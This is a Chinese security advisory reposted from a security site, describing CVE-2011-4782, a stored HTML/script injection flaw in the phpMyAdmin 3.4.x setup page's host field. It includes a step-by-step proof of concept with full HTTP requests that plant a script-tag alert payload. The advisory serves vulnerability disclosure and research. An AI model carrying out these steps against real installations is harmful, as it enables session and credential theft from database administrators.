phpMyAdmin3.4.x “$host”变量HTML注入漏洞

发布日期:2011-12-22
更新日期:2011-12-26

受影响系统:
phpMyAdmin phpMyAdmin 3.4.x
不受影响系统:
phpMyAdmin phpMyAdmin 3.4.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51166
CVE ID: CVE-2011-4782

phpMyAdmin是一个用PHP编写的,可以通过web方式控制和操作MySQL数据库。

phpMyAdmin允许用户通过其Setup界面添加数据库服务器,但对主机名没有任何输入验证。攻击者可提供特制的HTML和脚本代码,利用$host变量的HTML注入漏洞窃取身份验证凭证或控制站点外观。

<*来源:Jason Leyrer
 
  链接:http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php
        https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt
*>

测试方法:
--------------------------------------------------------------------------------

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jason Leyrer ()提供了如下测试方法:

1. Request the Setup interface's index page in order to obtain the
phpMyAdmin cookie and the value of 'token', which appears in the response
body:

Request
-------
GET /phpmyadmin/setup/index.php HTTP/1.1

Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7722
Content-Type: text/html; charset=utf-8

---snip---

<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />


2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to
the 'Servers-0-host' input field in Add New Server mode, as shown in the
postdata of the following request:


Request
-------
POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server HTTP/1.1
Host: 192.168.23.128
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://192.168.23.128/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 1430

tab_hash=&check_page_refresh=1&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&Servers-0-verbose=&Servers-0-host=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_save=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_http_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userprefs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-allow=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-userconfig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-history=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_default_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CRENAME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDELETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VIEW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_table=on&Servers-0-tracking_add_drop_database=on


3. View unsanitized script tags on the Setup overview page:

Request
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Host: 192.168.23.128
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://192.168.23.128/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en

Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:44:18 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Expires: Thu, 01 Dec 2011 16:44:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:44:18 GMT
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7852
Content-Type: text/html; charset=utf-8

---snip---

<div class="notice" id="Servers/1/ssl"><h4>Use SSL (<script>alert('XSS');</script>)</h4>You should use SSL connections if your web server supports it.</div>

Please note that valid database credentials are not required to exploit
this vulnerability.

本文由 华盟网 作者:AlexFrankly 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论